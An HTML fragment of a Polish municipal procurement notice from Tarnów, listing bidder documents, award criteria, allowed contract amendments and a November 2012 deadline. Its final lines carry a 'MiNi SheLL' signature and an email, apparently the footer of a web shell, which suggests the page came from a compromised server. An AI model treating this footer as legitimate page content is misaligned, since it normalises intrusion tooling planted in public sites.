<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca w przetargu (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobie innego podmiotu - osobie/ach zdolnej/ych do wykonania zamówienia, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tą/tymi osobą/ami, w szczególności przedstawiając w tym celu w oryginale pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji osoby/osób z uprawnieniami jak wskazano wyżej, na okres korzystania z tej osoby/osób przy wykonywaniu zamówienia
2.	W celu wykazania, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 2 ustawy, przedkłada dokumenty i oświadczenia określone w pkt III.4.1 oraz dokument potwierdzający wniesienie wadium.
3.	W przypadku wykonawców posiadających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej: jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 
4.	W przypadku, gdy uprawnienie do podpisania oferty nie wynika nie wynika z dokumentu, o którym mowa w pkt. III.4.2, do oferty dodatkowo należy załączyć stosowne pełnomocnictwo podpisane przez osobę(y) uprawnioną(e) do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy. Pełnomocnictwa należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmiany osób uczestniczących przy wykonywaniu umowy, które są w niej wymienione - w  trakcie realizacji umowy. Zmiana musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje zmianę taką wyłącznie wtedy, gdy kwalifikacje i doświadczenie proponowanych osób będą nie gorsze niż wymagane postanowieniami Specyfikacji Istotnych Warunków Zamówienia.
2. Jeżeli Wykonawca wykazując spełnienie warunku posiadania wiedzy i doświadczenia polegał na wiedzy i doświadczeniu podwykonawcy, zmiana takiego podwykonawcy jest możliwa jedynie w przypadku wykazania spełnienia tego warunku przez proponowanego Podwykonawcę. Zmiana podwykonawcy musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego (jeżeli wykonawca nie wskazał w ofercie zakresu zamówienia, który zamierza powierzyć podwykonawcy/om, niniejszy punkt nie zostanie wprowadzony do umowy).
3. Zamawiający przewiduje możliwość dokonania zmian postanowień umowy dotyczących:
3.1.	zmiany sposobu i zakresu wykonania zamówienia w przypadku zmiany przepisów prawnych powodujących konieczność dokonania zmian w umowie,
3.2.	zmiany terminu wykonania zamówienia w przypadku, gdy zmiana terminu jest konieczna z przyczyn niezależnych od Wykonawcy, których Wykonawca nie mógł przewidzieć przed zawarciem umowy, a które wpływają na niemożność dochowania terminu realizacji zamówienia przez Wykonawcę. 
4. Zmiany treści umowy dopuszczone w pkt. 1 - 3 nie mogą prowadzić do zwiększenia wynagrodzenia określonego w umowie.
5. Zamawiający przewiduje także zmianę postanowień umowy w przypadku zmiany stawek podatku od towarów i usług.
6. Każda ze stron zobowiązana jest niezwłocznie poinformować o okolicznościach stanowiących podstawę do dokonania zmiany w umowie. 
7. Wszelkie zmiany umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu do umowy pod rygorem nieważności z uwzględnieniem art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://portal.tarnow.bip-gov.info.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Geodezji i Nieruchomości Urzędu Miasta Tarnowa, 33-100 Tarnów, ul. Nowa 3, pok. 219, tel. 14/688-27-69..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2012 godzina 08:00, miejsce: Urząd Miasta Tarnowa, 33-100 Tarnów, ul. Nowa 4, parter sala nr 1 - Kancelaria Główna w Centrum Obsługi Mieszkańców..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie przewiduje zawarcia umowy ramowej oraz ustanowienia dynamicznego systemu zakupów.
2. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com